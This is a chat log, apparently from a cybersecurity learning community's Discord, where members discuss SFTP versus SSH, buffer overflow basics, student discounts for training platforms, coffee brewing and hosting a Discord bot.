Well anything google tbh

When the frickin fbi tells you to put ad blockers so yeah I'm trusting them more than google

Yes, docx files are archives. Basically a bunch of xml files that allow Word to do Word things.

Yeah that was a trip unzipping it in kali.

First time lol

They have another name for the XML though, I forget what it is.

Wait till chrome does that and fire Fox booms in useg

Chrome Will be like: where did or user go?

Can anyone explain to me why the memory stores data temporarily and why the hard disk does not store it?

Could you be more specific?

Do you mean RAM?

reading and writing from RAM is much faster than to a hard disk

Yeah

i didn't undersand buffer overflow

So you know what the stack is?

Why is there a feature in C++ that stores 6 bytes in memory?

no

@slender current https://www.youtube.com/watch?v=k4hqdVo3cqk

I use DuckDuckGo

Same

But idk how private it says it really is

I know that when someone writes C++ code and reserves 6 bytes in memory, if I enter data more than 6, I will exceed the storage space.

When it comes to Buffer Overflow, you need to start low down and understand how a computer executes porocesses before you go in and do BoF.

Ok

i will search

That video explains it pretty well 🙂

What are porocesses

Processes?

Oh GOOD

so this video exapmle everything in 44 min?

No, it explains a basic buffer overflow

k

ty

BoF is a difficult topic :))

Yes

im confused

is SFTP another name for SSH?

We can’t help with school exam stuff

no its not a real exam

you wouldnt be able to use discord on a real exam

Is this sec+ professor dion ?

A+

So SFTP is FTP but with encryption

like http and https

Yea but 22 is SSH so thats weird

it would mean that both sftp and ssh run on the same port

yeah they do

SFTP runs over ssh

crazy never heard of two protocols using the same port

It’s secure file transfer protocol

@rapid merlinhttps://www.integrate.io/blog/ssh-vs-sftp/

probably read this

yeah already getting into it

confusing af

Basically uses ssh to transfer files securely

Ssh Encryption to be exact

It's an extension to ssh

https://tenor.com/view/flipper-zero-flipperzero-flipper-zero-flipper-zero-hack-the-planet-gif-17948818080542124100

ssh is like a secure version of telnet, sftp it's a secure version of ftp 🙂

thats not whats confusing..

.

sftp is an extension to ssh

So ssh runs on the port

But if it's ssh 2.0 it's capable of sftp

yeah thats one of those thing you just have to memorize

Yeah the SSH server has all those abilities. It also does scp

Hello peeps, Anyone willing to give me a 1 year subscription to HTBacademy or THM?

Here's what you'll get in return:

• A broke uni student's loyalty
• Experiencing a kid make his parents proud, coz you couldn't make yours proud.
• Free access to future services.

Here's wht's in for me:

• I get to utilize my learning ability to soak up all the knowledge available on HTB/ THM
• Get to make money, and safeguard my future from AI's clutches
• I get to build a network
• and Finally have hope & peace in life

I'll... Allow

Just don't spam it. One is enough

much appreciated @jagged moon

You are aware of the THM student subscription?

There's hundreds of walkthroughs and challenges free on THM, like over 72% of rooms are free. Also, if you have a student email address there are discounts for THM and HTB Academy already. You can get those services far cheaper than I can, and I'm not currently working.

yes, i'm just BROKE in caps

Just do the free rooms first

noted @proven quartz @buoyant tree

Like, there's a 35% student discount on THM, and HTB Academy is about $8 a month for students

Waiting for someone to mention avocado toast and starbucks

Nope. Eat and drink what you enjoy. The prices for these services are fair and it's really important to make them extra available for students. We all realise student life is challenging

Not exactly a fan of avocado toast myself, and Starbucks is a little expensive for my taste (as I buy "specialty" beans and probably spend the same amount as Starbucks)

Haven't pulled the trigger yet but james hoffmann is going to make me buy an espresso machine...

it is expensive, their coffee is average at best. A lot of marketing not enough quality it doesn't worth the money

I bought a Baratza Encore and a cheap French Press

Looking at a La Pavoni Europiccola. Maybe for christmas

I've also got a mocha pot

Also, speak to your school/college and see if they have their own facilities with these education providers. A lot of schools and colleges do provide this training for their students

And a Ninja Pour-Over/Pod mixed machine

Right now the French Press gets used the most

thanks i'll def check it out with my uni

Gave +1 Rep to @proven quartz (current: #21 - 380)

I have a Macchinetta (moka pot) french press and expresso machine I mostly use moka and expresso

I need to revisit the moka pot

A local cafe charges people who order expresso extra, it's even on the menu

Best of luck with your studies, and have fun with it all

I also tried making Turkish coffee in a regular cooking pot, did not go well

nothing compare to expresso, but if I have to choose between moka and french press, it's moka all the way

I like to have a volume of coffee, so espresso doesn't really do it for me

I think I might make decaf right now

turkish coffee with cardamom

Yep

My ex's dad was a plumber. He called it the coffee toilet

I tried it in the moka pot first, almost exploded, then tried it in a regular pot

It was ground way too fine for the moka pot

I love moka, that how I used to make my coffee at home when I lived in Italy, I have a little moka that I carry in my suitcase just in case 😂

Dlla bsbkfkd Ixafbp xka Dbkqibjxk, f elmb xii lc vlr exa lo x exsfkd x kfzb axv. (c23)

exploded 😂 never happened to me

It was so sketchy, it probably wasn't close but it was making abnormal noises

No doubt it makes great coffee. I didn't drink it at that point but it's just cos of how it works that he called it that. He preferred that way too

for a quick decent expresso I have a nespresso, I'll buy a more professional no automatic machine in the future

when I move to an apartment where I can have a water connection for the machine, right now it's too much trouble for a cup of coffee 😂 nespresso it work fine when I want a ristretto 🙂

Well I don't drink coffee at home, and I don't drink it every day. I go to one of a handful of coffee shops I like. I also rarely drink booze at home and go out a couple of times a week maybe. I generally only smoke with a coffee or a beer when I'm out. If I have a smoke at home it's only when I'm up working on something at 1 or 2am 😛

I do drink coffee at booze at home, but still go out to a coffee shops and bars as a social thing

Okay so Stalker runs perfectly.

Yeah it's a social thing for me as well, or sometimes a place to decompress, recharge... I might just go to read a book or stare into space

Issue is now: My Linux partition doesn't recognise its WLAN NIC.

"Hardware: Missing".

And I have absolutely fuck-all of an idea.

... Wait a second, I kind of do.

there is a perfect spot in tel aviv beach the tables are just meters from the sand an the waves ❤️

Here I have spots that are perfect for sunny, rainy, hot/cold and windy days. Sometimes, they're the same spot. Sometimes all the same day

Damn, been binging r/linkedinlunatics posts and they are hella fun

Yeah I've seen a bunch of those on bookface. LinkedIn is a very strange place

Still also, the best place to find jobs for most people

Sometimes the pretentious arseholes over there are amazing at coming up BS

Well they might be completely different off that platform or in different spaces. Just doing what they feel is needed to keep the money coming in and rolling on. The lengths people are willing to go to are a great source of entertainment

@mossy river Sorry to disturb but im planning on making a discord bot for my personal server and i was curious what the THM bot is hosted on? Like just a PC running it or a THM server or what?

rumor was a raspberry pi

The old one was an AWS instance. Given that's how the rest of THM works, I would be surprised if the new one isn't also an AWS instance.

Alright thank you!

Gave +1 Rep to @pallid lotus (current: #9 - 758)

For a personal server I'd suggest you either go for something small on premises (e.g., a raspberry pi / orange pi / etc), or a cheaper cloud provider. Contabo is a decent choice for long term projects, or something like digital ocean for brand recognition.